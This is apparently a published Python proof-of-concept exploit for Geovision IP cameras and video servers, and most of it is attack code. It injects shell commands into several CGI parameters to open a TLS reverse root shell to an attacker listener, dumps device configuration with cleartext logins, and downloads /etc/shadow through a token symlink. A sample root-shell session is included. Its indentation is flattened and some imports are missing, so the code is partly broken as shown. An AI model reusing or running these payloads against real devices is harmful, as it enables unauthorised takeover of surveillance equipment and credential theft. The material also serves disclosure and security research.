#!/usr/bin/env python2.7
#
# [SOF]
#
# Geovision Inc. IP Camera & Video Server Remote Command Execution PoC
# Researcher: bashis <mcw noemail eu> (November 2017)
#
###########################################################################################
#
# 1. Pop stunnel TLSv1 reverse root shell [Local listener: 'ncat -vlp <LPORT> --ssl'; Verified w/ v7.60]
# 2. Dump all settings of remote IPC with Login/Passwd in cleartext
# Using:
# - CGI: 'Usersetting.cgi' (Logged in user) < v3.12 (Very old) [Used as default]
# - CGI: 'FilterSetting.cgi' (Logged in user) < v3.12 (Very old)
# - CGI: 'PictureCatch.cgi' (Anonymous) > v3.10
# - CGI: 'JpegStream.cgi' (Anonymous) > v3.10
# 3. GeoToken PoC to login and download /etc/shadow via generated token symlink
#
# Sample reverse shell:
# $ ncat -vlp 1337 --ssl
# Ncat: Version 7.60 ( https://nmap.org/ncat )
# Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
# Ncat: SHA-1 fingerprint: 3469 C118 43F0 043A 5168 189B 1D67 1131 4B5B 1603
# Ncat: Listening on :::1337
# Ncat: Listening on 0.0.0.0:1337
# Ncat: Connection from 192.168.57.20.
# Ncat: Connection from 192.168.57.20:16945.
# /bin/sh: can't access tty; job control turned off
# /www # id
# id
# uid=0(root) gid=0(root)
# /www # uname -a
# uname -a
# Linux IPCAM 2.6.18_pro500-davinci #1 Mon Jun 19 21:27:10 CST 2017 armv5tejl unknown
# /www # exit
# $
############################################################################################
import sys
import socket
import urllib, urllib2, httplib
import json
import hashlib
import commentjson # pip install commentjson
import xmltodict # pip install xmltodict
import select
import string
import argparse
import random
import base64
import ssl
import json
import os
import re
#from pwn import *
def split2len(s, n):
def _f(s, n):
while s:
yield s[:n]
s = s[n:]
return list(_f(s, n))
# Ignore download of '302 Found/Location' redirections
class NoRedirection(urllib2.HTTPErrorProcessor):
def http_response(self, request, response):
return response
https_response = http_response
class HTTPconnect:
def __init__(self, host, proto, verbose, credentials, Raw, noexploit):
self.host = host
self.proto = proto
self.verbose = verbose
self.credentials = credentials
self.Raw = Raw
self.noexploit = False
self.noexploit = noexploit
def Send(self, uri, query_headers, query_data, ID):
self.uri = uri
self.query_headers = query_headers
self.query_data = query_data
self.ID = ID
# Connect-timeout in seconds
timeout = 10
socket.setdefaulttimeout(timeout)
url = '{}://{}{}'.format(self.proto, self.host, self.uri)
if self.verbose:
print "[Verbose] Sending:", url
if self.proto == 'https':
if hasattr(ssl, '_create_unverified_context'):
print "[i] Creating SSL Unverified Context"
ssl._create_default_https_context = ssl._create_unverified_context
if self.credentials:
Basic_Auth = self.credentials.split(':')
if self.verbose:
print "[Verbose] User:",Basic_Auth[0],"password:",Basic_Auth[1]
try:
pwd_mgr = urllib2.HTTPpasswordMgrWithDefaultDahua_realm()
pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])
auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)
if verbose:
http_logger = urllib2.HTTPHandler(debuglevel = 1) # HTTPSHandler... for HTTPS
opener = urllib2.build_opener(auth_handler,NoRedirection,http_logger)
else:
opener = urllib2.build_opener(auth_handler,NoRedirection)
urllib2.install_opener(opener)
except Exception as e:
print "[!] Basic Auth Error:",e
sys.exit(1)
else:
# Don't follow redirects!
if verbose:
http_logger = urllib2.HTTPHandler(debuglevel = 1)
opener = urllib2.build_opener(http_logger,NoRedirection)
urllib2.install_opener(opener)
else:
NoRedir = urllib2.build_opener(NoRedirection)
urllib2.install_opener(NoRedir)
if self.noexploit and not self.verbose:
print "[<] 204 Not Sending!"
html = "Not sending any data"
return html
else:
if self.query_data:
req = urllib2.Request(url, data=urllib.urlencode(self.query_data,doseq=True), headers=self.query_headers)
if self.ID:
Cookie = 'CLIENT_ID={}'.format(self.ID)
req.add_header('Cookie', Cookie)
else:
req = urllib2.Request(url, None, headers=self.query_headers)
if self.ID:
Cookie = 'CLIENT_ID={}'.format(self.ID)
req.add_header('Cookie', Cookie)
rsp = urllib2.urlopen(req)
if rsp:
print "[<] {}".format(rsp.code)
if self.Raw:
return rsp
else:
html = rsp.read()
return html
#
# Validate correctness of HOST, IP and PORT
#
class Validate:
def __init__(self,verbose):
self.verbose = verbose
# Check if IP is valid
def CheckIP(self,IP):
self.IP = IP
ip = self.IP.split('.')
if len(ip) != 4:
return False
for tmp in ip:
if not tmp.isdigit():
return False
i = int(tmp)
if i < 0 or i > 255:
return False
return True
# Check if PORT is valid
def Port(self,PORT):
self.PORT = PORT
if int(self.PORT) < 1 or int(self.PORT) > 65535:
return False
else:
return True
# Check if HOST is valid
def Host(self,HOST):
self.HOST = HOST
try:
# Check valid IP
socket.inet_aton(self.HOST) # Will generate exeption if we try with DNS or invalid IP
# Now we check if it is correct typed IP
if self.CheckIP(self.HOST):
return self.HOST
else:
return False
except socket.error as e:
# Else check valid DNS name, and use the IP address
try:
self.HOST = socket.gethostbyname(self.HOST)
return self.HOST
except socket.error as e:
return False
class Geovision:
def __init__(self, rhost, proto, verbose, credentials, raw_request, noexploit, headers, SessionID):
self.rhost = rhost
self.proto = proto
self.verbose = verbose
self.credentials = credentials
self.raw_request = raw_request
self.noexploit = noexploit
self.headers = headers
self.SessionID = SessionID
def Login(self):
try:
print "[>] Requesting keys from remote"
URI = '/ssi.cgi/Login.htm'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,None,None)
response = response.read()[:1500]
response = re.split('[()<>?"\n_&;/ ]',response)
# print response
except Exception as e:
print "[!] Can't access remote host... ({})".format(e)
sys.exit(1)
try:
#
# Geovision way to have MD5 random Login and Password
#
CC1 = ''
CC2 = ''
for check in range(0,len(response)):
if response[check] == 'cc1=':
CC1 = response[check+1]
print "[i] Random key CC1: {}".format(response[check+1])
elif response[check] == 'cc2=':
CC2 = response[check+1]
print "[i] Random key CC2: {}".format(response[check+1])
"""
#
# Less interesting to know, but leave it here anyway.
#
# If the remote server has enabled guest view, these below will not be '0'
elif response[check] == 'GuestIdentify':
print "[i] GuestIdentify: {}".format(response[check+2])
elif response[check] == 'uid':
if response[check+2]:
print "[i] uid: {}".format(response[check+2])
else:
print "[i] uid: {}".format(response[check+3])
elif response[check] == 'pid':
if response[check+2]:
print "[i] pid: {}".format(response[check+2])
else:
print "[i] pid: {}".format(response[check+3])
"""
if not CC1 and not CC2:
print "[!] CC1 and CC2 missing!"
print "[!] Cannot generate MD5, exiting.."
sys.exit(0)
#
# Geovision MD5 Format
#
uMD5 = hashlib.md5(CC1 + username + CC2).hexdigest().upper()
pMD5 = hashlib.md5(CC2 + password + CC1).hexdigest().upper()
# print "[i] User MD5: {}".format(uMD5)
# print "[i] Pass MD5: {}".format(pMD5)
self.query_args = {
"username":"",
"password":"",
"Apply":"Apply",
"umd5":uMD5,
"pmd5":pMD5,
"browser":1,
"is_check_OCX_OK":0
}
print "[>] Logging in"
URI = '/LoginPC.cgi'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
# print response.info()
# if we don't get 'Set-Cookie' back from the server, the Login has failed
if not (response.info().get('Set-Cookie')):
print "[!] Login Failed!"
sys.exit(1)
if verbose:
print "Cookie: {}".format(response.info().get('Set-Cookie'))
return response.info().get('Set-Cookie')
except Exception as e:
print "[i] What happen? ({})".format(e)
exit(0)
def DeviceInfo(self):
try:
URI = '/PSIA/System/deviceInfo'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,None,None)
deviceinfo = xmltodict.parse(response)
print "[i] Remote target: {} ({})".format(deviceinfo['DeviceInfo']['model'],deviceinfo['DeviceInfo']['firmwareVersion'])
return True
except Exception as e:
print "[i] Info about remote target failed ({})".format(e)
return False
def UserSetting(self,DumpSettings):
self.DumpSettings = DumpSettings
if self.DumpSettings:
print "[i] Dump Config of remote"
SH_CMD = '`echo "<!--#include file="SYS_CFG"-->" >/var/www/tmp/Login.htm`'
else:
print "[i] Launching TLSv1 privacy reverse shell"
self.headers = {
'Connection': 'close',
'Accept-Language' : 'en-US,en;q=0.8',
'Cache-Control' : 'max-age=0',
'User-Agent':'Mozilla',
'Accept':'client=yes\\x0apty=yes\\x0asslVersion=TLSv1\\x0aexec=/bin/sh\\x0a'
}
SH_CMD = ';echo -en \"$HTTP_ACCEPT connect=LHOST:LPORT\"|stunnel -fd 0;'
SH_CMD = SH_CMD.replace("LHOST",lhost)
SH_CMD = SH_CMD.replace("LPORT",lport)
print "[>] Pwning Usersetting.cgi"
self.query_args = {
"umd5":SH_CMD,
"pmd5":"GEOVISION",
"nmd5":"PWNED",
"cnt5":"",
"username":"",
"passwordOld":"",
"passwordNew":"",
"passwordRetype":"",
"btnSubmitAdmin":"1",
"submit":"Apply"
}
try:
URI = '/UserSetting.cgi'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
if DumpSettings:
print "[i] Dumping"
URI = '/ssi.cgi/tmp/Login.htm'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,None,self.SessionID)
print response
return True
except Exception as e:
if str(e) == "timed out" or str(e) == "('The read operation timed out',)":
print "[!] Enjoy the shell... ({})".format(e)
return True
def PictureCatch(self,DumpSettings):
self.DumpSettings = DumpSettings
if self.DumpSettings:
print "[i] Dump Config of remote"
SH_CMD = '`echo "<!--#include file="SYS_CFG"-->" >/var/www/tmp/Login.htm`'
else:
print "[i] Launching TLSv1 privacy reverse shell"
self.headers = {
'Connection': 'close',
'Accept-Language' : 'en-US,en;q=0.8',
'Cache-Control' : 'max-age=0',
'User-Agent':'Mozilla',
'Accept':'client=yes\\x0apty=yes\\x0asslVersion=TLSv1\\x0aexec=/bin/sh\\x0a'
}
SH_CMD = ';echo -en \"$HTTP_ACCEPT connect=LHOST:LPORT\"|stunnel -fd 0;'
SH_CMD = SH_CMD.replace("LHOST",lhost)
SH_CMD = SH_CMD.replace("LPORT",lport)
print "[>] Pwning PictureCatch.cgi"
self.query_args = {
"username":SH_CMD,
"password":"GEOVISION",
"attachment":"1",
"channel":"1",
"secret":"1",
"key":"PWNED"
}
try:
URI = '/PictureCatch.cgi'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
if DumpSettings:
print "[i] Dumping"
URI = '/ssi.cgi/tmp/Login.htm'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,None,self.SessionID)
print response
return True
except Exception as e:
if str(e) == "timed out" or str(e) == "('The read operation timed out',)":
print "[!] Enjoy the shell... ({})".format(e)
return True
def JpegStream(self,DumpSettings):
self.DumpSettings = DumpSettings
if self.DumpSettings:
print "[i] Dump Config of remote"
SH_CMD = '`echo "<!--#include file="SYS_CFG"-->" >/var/www/tmp/Login.htm`'
else:
print "[i] Launching TLSv1 privacy reverse shell"
self.headers = {
'Connection': 'close',
'Accept-Language' : 'en-US,en;q=0.8',
'Cache-Control' : 'max-age=0',
'User-Agent':'Mozilla',
'Accept':'client=yes\\x0apty=yes\\x0asslVersion=TLSv1\\x0aexec=/bin/sh\\x0a'
}
SH_CMD = ';echo -en \"$HTTP_ACCEPT connect=LHOST:LPORT\"|stunnel -fd 0;'
SH_CMD = SH_CMD.replace("LHOST",lhost)
SH_CMD = SH_CMD.replace("LPORT",lport)
print "[>] Pwning JpegStream.cgi"
self.query_args = {
"username":SH_CMD,
"password":"GEOVISION",
"attachment":"1",
"channel":"1",
"secret":"1",
"key":"PWNED"
}
try:
URI = '/JpegStream.cgi'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
if DumpSettings:
print "[i] Dumping"
URI = '/ssi.cgi/tmp/Login.htm'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,None,self.SessionID)
print response
return True
except Exception as e:
if str(e) == "timed out" or str(e) == "('The read operation timed out',)":
print "[!] Enjoy the shell... ({})".format(e)
return True
#
# Interesting example of bad code and insufficent sanitation of user input.
# ';' is filtered in v3.12, and when found in the packet, the packet is simply ignored.
#
# Later in the chain the Geovision code will write provided userinput to flash, we may overwrite unwanted flash area if we playing to much here.
# So, we are limited to 31 char per line (32 MUST BE NULL), to play safe game with this bug.
#
# v3.10->3.12 changed how to handle ipfilter
# From:
# User input to system() call in FilterSetting.cgi to set iptable rules and then save them in flash
# To:
# User input transferred from 'FilterSetting.cgi' to flash (/dev/mtd11), and when the tickbox to activate the filter rules,
# '/usr/local/bin/geobox-iptables-reload' is triggered to read these rules from flash and '/usr/local/bin/iptables' via 'geo_net_filter_table_add'
# with system() call in 'libgeo_net.so'
#
# Should end up into;
# 23835 root 576 S sh -c /usr/local/bin/iptables -A INPUT -s `/usr/loca...[trunkated]
# 23836 root 2428 S /usr/local/bin/stunnel /tmp/x
# 23837 root 824 S /bin/sh
def FilterSetting(self):
try:
print "[>] Pwning FilterSetting.cgi"
#
# ';' will be treated by the code as LF
#
# Let's use some TLSv1 privacy for the reverse shell
#
SH_CMD = 'client=yes;connect=LHOST:LPORT;exec=/bin/sh;pty=yes;sslVersion=TLSv1'
#
SH_CMD = SH_CMD.replace("LHOST",lhost)
SH_CMD = SH_CMD.replace("LPORT",lport)
ShDict = SH_CMD.split(';')
MAX_SIZE = 31 # Max Size of the strings to generate
LF = 0
LINE = 0
CMD = {}
CMD_NO_LF = "`echo -n \"TMP\">>/tmp/x`"
CMD_DO_LF = "`echo \"TMP\">>/tmp/x`"
SIZE = MAX_SIZE-(len(CMD_NO_LF)-3) # Size of availible space for our input in 'SH_CMD'
# Remove, just in case
CMD[LINE] = "`rm -f /tmp/x`"
URI = '/FilterSetting.cgi'
#
# This loop will make the correct aligment of user input
#
for cmd in range(0,len(ShDict)):
CMD_LF = math.ceil(float(len(ShDict[cmd])) / SIZE)
cmd_split = split2len(ShDict[cmd], SIZE)
for CMD_LEN in range(0,len(cmd_split)):
LINE += 1
LF += 1
if (len(cmd_split[CMD_LEN]) > SIZE-1) and (CMD_LF != LF):
CMD[LINE] = CMD_NO_LF.replace("TMP",cmd_split[CMD_LEN])
else:
CMD[LINE] = CMD_DO_LF.replace("TMP",cmd_split[CMD_LEN])
LF = 0
if verbose:
print "Len: {} {}".format(len(CMD[LINE]),CMD[LINE])
# Add two more commands to execute stunnel and remove /tmp/x
CMD[LINE+1] = "`/usr/local/bin/stunnel /tmp/x`" # 31 char, no /usr/local/bin in $PATH
CMD[LINE+2] = "`rm -f /tmp/x`" # Some bug here, think it is timing as below working
CMD[LINE+3] = "`rm -f /tmp/x`" # Working, this is only one more add/enable/disable/remove loop
#
# Below while() loop will create following /tmp/x, execute 'stunnel' and remove /tmp/x
#
# client=yes
# connect=<LHOST>:<LPORT>
# exec=/bin/sh
# pty=yes
# sslVersion=TLSv1
#
NEW_IP_FILTER = 1 # > v3.12
CMD_LEN = 0
who = 0
# Clean up to make room, just in case
for Remove in range(0,4):
print "[>] Cleaning ipfilter entry: {}".format(Remove+1)
self.query_args = {
"bPolicy":"0", # 1 = Enable, 0 = Disable
"Delete":"Remove", # Remove entry
"szIpAddr":"",
"byOpId":"0", # 0 = Allow, 1 = Deny
"dwSelIndex":"0",
}
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
while True:
if who == len(CMD):
break
if CMD_LEN < 4:
print "[>] Sending: {} ({})".format(CMD[who],len(CMD[who]))
self.query_args = {
"szIpAddr":CMD[who], # 31 char limit
"byOpId":"0", # 0 = Allow, 1 = Deny
"dwSelIndex":"0", # Seems not to be in use
"Add":"Apply"
}
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
response = re.split('[()<>?"\n_&;/ ]',response)
print response
if NEW_IP_FILTER:
for cnt in range(0,len(response)):
if response[cnt] == 'iptables':
NEW_IP_FILTER = 0
print "[i] Remote don't need Enable/Disable"
break
CMD_LEN += 1
who += 1
time.sleep(2) # Seems to be too fast without
# NEW Way
elif NEW_IP_FILTER:
print "[>] Enabling ipfilter"
self.query_args = {
"bPolicy":"1", # 1 = Enable, 0 = Disable
"szIpAddr":"",
"byOpId":"0", # 0 = Allow, 1 = Deny
"dwSelIndex":"0",
}
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
print "[i] Sleeping..."
time.sleep(5)
print "[>] Disabling ipfilter"
self.query_args = {
"szIpAddr":"",
"byOpId":"0",
"dwSelIndex":"0",
}
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
for Remove in range(0,4):
print "[>] Deleting ipfilter Entry: {}".format(Remove+1)
self.query_args = {
"bPolicy":"0", # 1 = Enable, 0 = Disable
"Delete":"Remove",
"szIpAddr":"",
"byOpId":"0",
"dwSelIndex":"0",
}
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
CMD_LEN = 0
# OLD Way
else:
for Remove in range(0,4):
print "[>] Deleting ipfilter Entry: {}".format(Remove+1)
self.query_args = {
"bPolicy":"0", # 1 = Enable, 0 = Disable
"Delete":"Remove",
"szIpAddr":"",
"byOpId":"0",
"dwSelIndex":"0",
}
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
CMD_LEN = 0
if NEW_IP_FILTER:
print "[i] Last sending"
print "[>] Enabling ipfilter"
self.query_args = {
"bPolicy":"1", # 1 = Enable, 0 = Disable
"szIpAddr":"",
"byOpId":"0", # 0 = Allow, 1 = Deny
"dwSelIndex":"0",
}
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
print "[i] Sleeping..."
time.sleep(5)
print "[>] Disabling ipfilter"
self.query_args = {
"szIpAddr":"",
"byOpId":"0",
"dwSelIndex":"0",
}
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
for Remove in range(0,4):
print "[>] Deleting ipfilter Entry: {}".format(Remove+1)
self.query_args = {
"bPolicy":"0", # 1 = Enable, 0 = Disable
"Delete":"Remove",
"szIpAddr":"",
"byOpId":"0",
"dwSelIndex":"0",
}
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
print "[!] Enjoy the shell... "
return True
except Exception as e:
if not NEW_IP_FILTER:
print "[i] Last sending"
for Remove in range(0,4):
print "[>] Deleting ipfilter Entry: {}".format(Remove+1)
self.query_args = {
"bPolicy":"0", # 1 = Enable, 0 = Disable
"Delete":"Remove",
"szIpAddr":"",
"byOpId":"0",
"dwSelIndex":"0",
}
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
print "[!] Enjoy the shell... "
return True
print "[!] Hmm... {}".format(e)
print response.read()
return True
def GeoToken(self):
print "[i] GeoToken PoC to login and download /etc/shadow via token symlink"
print "[!] You must have valid login and password to generate the symlink"
try:
#########################################################################################
# This is how to list remote *.wav and *.avi files in /storage.
"""
print "[>] Requesting token1"
URI = '/BKCmdToken.php'
response = HTTPconnect(rhost,proto,verbose,credentials,raw_request,noexploit).Send(URI,headers,None,None)
result = json.load(response)
if verbose:
print json.dumps(result,sort_keys=True,indent=4, separators=(',', ': '))
print "[i] Request OK?: {}".format(result['success'])
if not result['success']:
sys.exit(1)
token1 = result['token']
#
# SAMPLE OUTPUT
#
#{
# "success": true,
# "token": "6fe1a7c1f34431acc7eaecba646b7caf"
#}
#
# Generate correct MD5 token2
token2 = hashlib.md5(hashlib.md5(token1 + 'gEo').hexdigest() + 'vIsIon').hexdigest()
query_args = {
"token1":token1,
"token2":token2
}
print "[>] List files"
URI = '/BKFileList.php'
response = HTTPconnect(rhost,proto,verbose,credentials,raw_request,noexploit).Send(URI,headers,query_args,None)
result = json.load(response)
if verbose:
print json.dumps(result,sort_keys=True,indent=4, separators=(',', ': '))
for who in result.keys():
print len(who)
#
# SAMPLE OUTPUT
#
#{
# "files": [
# {
# "file_size": "2904170",
# "filename": "event20171105104946001.avi",
# "remote_path": "/storage/hd11-1/GV-MFD1501-0a99a9/cam01/2017/11/05"
# },
# {}
# ]
#}
#########################################################################################
"""
# Request remote MD5 token1
print "[>] Requesting token1"
URI = '/BKCmdToken.php'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,None,None)
result = json.load(response)
if verbose:
print json.dumps(result,sort_keys=True,indent=4, separators=(',', ': '))
print "[i] Request OK?: {}".format(result['success'])
if not result['success']:
return False
token1 = result['token']
#
# SAMPLE OUTPUT
#{
# "success": true,
# "token": "6fe1a7c1f34431acc7eaecba646b7caf"
#}
#
#
# Generate correct MD5 token2
#
# MD5 Format: <login>:<token1>:<password>
#
token2 = hashlib.md5(username + ':' + token1 + ':' + password).hexdigest()
#
# symlink this file for us
#
filename = '/etc/shadow'
self.query_args = {
"token1":token1,
"token2":token2,
"filename":filename
}
print "[>] Requesting download file link"
URI = '/BKDownloadLink.cgi'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,None)
response = response.read()#[:900]
response = response.replace("'", "\"")
result = json.loads(response)
print "[i] Request OK?: {}".format(result['success'])
if not result['success']:
return False
if verbose:
print json.dumps(result,sort_keys=True,indent=4, separators=(',', ': '))
#
# SAMPLE OUTPUT
#
#{
# "dl_folder": "/tmp",
# "dl_token": "C71689493825787.dltoken",
# "err_code": 0,
# "success": true
#}
#
URI = '/ssi.cgi' + result['dl_folder'] + '/' + result['dl_token']
print "[>] downloading ({}) with ({})".format(filename,URI)
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,None)
response = response.read()
print response
return True
except Exception as e:
print "[i] GEO Token fail ({})".format(e)
return False
if __name__ == '__main__':
#
# Help, info and pre-defined values
#
INFO = '[Geovision Inc. IPC/IPV RCE PoCs (2017 bashis <mcw noemail eu>)]\n'
HTTP = "http"
HTTPS = "https"
proto = HTTP
verbose = False
noexploit = False
raw_request = True
rhost = '192.168.57.20' # Default Remote HOST
rport = '80' # Default Remote PORT
lhost = '192.168.57.1' # Default Local HOST
lport = '1337' # Default Local PORT
# creds = 'root:pass'
credentials = False
#
# Geovision stuff
#
SessionID = str(int(random.random() * 100000))
DumpSettings = False
deviceinfo = False
GEOtoken = False
anonymous = False
filtersetting = False
usersetting = False
jpegstream = False
picturecatch = False
# Geovision default
username = 'admin'
password = 'admin'
#
# Try to parse all arguments
#
try:
arg_parser = argparse.ArgumentParser(
prog=sys.argv[0],
description=('[*] '+ INFO +' [*]'))
arg_parser.add_argument('--rhost', required=True, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
arg_parser.add_argument('--rport', required=True, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')
arg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']')
arg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']')
arg_parser.add_argument('--autoip', required=False, default=False, action='store_true', help='Detect External Connect Back IP [Default: False]')
arg_parser.add_argument('--deviceinfo', required=False, default=False, action='store_true', help='Request model and firmware version')
arg_parser.add_argument('-g','--geotoken', required=False, default=False, action='store_true', help='Try retrieve /etc/shadow with geotoken')
arg_parser.add_argument('-a','--anonymous', required=False, default=False, action='store_true', help='Try pwning as anonymous')
arg_parser.add_argument('-f','--filtersetting', required=False, default=False, action='store_true', help='Try pwning with FilterSetting.cgi')
arg_parser.add_argument('-p','--picturecatch', required=False, default=False, action='store_true', help='Try pwning with PictureCatch.cgi')
arg_parser.add_argument('-j','--jpegstream', required=False, default=False, action='store_true', help='Try pwning with JpegStream.cgi')
arg_parser.add_argument('-u','--usersetting', required=False, default=False, action='store_true', help='Try pwning with UserSetting.cgi')
arg_parser.add_argument('-d','--dump', required=False, default=False, action='store_true', help='Try pwning remote config')
arg_parser.add_argument('--username', required=False, help='Username [Default: '+ username +']')
arg_parser.add_argument('--password', required=False, help='password [Default: '+ password +']')
if credentials:
arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ credentials + ']')
arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')
arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]')
arg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]')
args = arg_parser.parse_args()
except Exception as e:
print INFO,"\nError: {}\n".format(str(e))
sys.exit(1)
print "\n[*]",INFO
if args.verbose:
verbose = args.verbose
#
# Check validity, update if needed, of provided options
#
if args.https:
proto = HTTPS
if not args.rport:
rport = '443'
if credentials and args.auth:
credentials = args.auth
if args.geotoken:
GEOtoken = args.geotoken
if args.anonymous:
anonymous = True
if args.deviceinfo:
deviceinfo = True
if args.dump:
DumpSettings = True
if args.filtersetting:
FilterSetting = True
if args.usersetting:
usersetting = True
if args.jpegstream:
jpegstream = True
if args.picturecatch:
picturecatch = True
if args.username:
username = args.username
if args.password:
password = args.password
if args.noexploit:
noexploit = args.noexploit
if args.rport:
rport = args.rport
if args.rhost:
rhost = args.rhost
IP = args.rhost
if args.lport:
lport = args.lport
if args.lhost:
lhost = args.lhost
elif args.autoip:
# HTTP check of our external IP
try:
headers = {
'Connection': 'close',
'Accept' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.8',
'Cache-Control' : 'max-age=0',
'User-Agent':'Mozilla'
}
print "[>] Trying to find out my external IP"
lhost = HTTPconnect("whatismyip.akamai.com",proto,verbose,credentials,False,noexploit).Send("/",headers,None,None)
if verbose:
print "[Verbose] Detected my external IP:",lhost
except Exception as e:
print "[<] ",e
sys.exit(1)
# Check if RPORT is valid
if not Validate(verbose).Port(rport):
print "[!] Invalid RPORT - Choose between 1 and 65535"
sys.exit(1)
# Check if RHOST is valid IP or FQDN, get IP back
rhost = Validate(verbose).Host(rhost)
if not rhost:
print "[!] Invalid RHOST"
sys.exit(1)
# Check if LHOST is valid IP or FQDN, get IP back
lhost = Validate(verbose).Host(lhost)
if not lhost:
print "[!] Invalid LHOST"
sys.exit(1)
# Check if RHOST is valid IP or FQDN, get IP back
rhost = Validate(verbose).Host(rhost)
if not rhost:
print "[!] Invalid RHOST"
sys.exit(1)
#
# Validation done, start print out stuff to the user
#
if args.https:
print "[i] HTTPS / SSL Mode Selected"
print "[i] Remote target IP:",rhost
print "[i] Remote target PORT:",rport
if not args.geotoken and not args.dump and not args.deviceinfo:
print "[i] Connect back IP:",lhost
print "[i] Connect back PORT:",lport
rhost = rhost + ':' + rport
headers = {
'Connection': 'close',
'Content-Type' : 'application/x-www-form-urlencoded',
'Accept' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.8',
'Cache-Control' : 'max-age=0',
'User-Agent':'Mozilla'
}
# Print Model and Firmware version
Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).DeviceInfo()
if deviceinfo:
sys.exit(0)
# Geovision token login within the function
#
if GEOtoken:
Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).DeviceInfo()
if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).GeoToken():
print "[!] Failed"
sys.exit(1)
else:
sys.exit(0)
if anonymous:
if jpegstream:
if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).JpegStream(DumpSettings):
print "[!] Failed"
sys.exit(0)
elif picturecatch:
if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).PictureCatch(DumpSettings):
print "[!] Failed"
sys.exit(0)
else:
print "[!] Needed: --anonymous [--picturecatch | --jpegstream]"
sys.exit(1)
else:
#
# Geovision Login needed
#
if usersetting:
if Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).Login():
if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).UserSetting(DumpSettings):
print "[!] Failed"
sys.exit(0)
elif filtersetting:
if Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).Login():
if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).FilterSetting():
print "[!] Failed"
sys.exit(0)
elif jpegstream:
if Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).Login():
if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).JpegStream(DumpSettings):
print "[!] Failed"
sys.exit(0)
elif picturecatch:
if Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).Login():
if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).PictureCatch(DumpSettings):
print "[!] Failed"
sys.exit(0)
else:
print "[!] Needed: --usersetting | --jpegstream | --picturecatch | --filtersetting"
sys.exit(1)
sys.exit(0)
#
# [EOF]
#
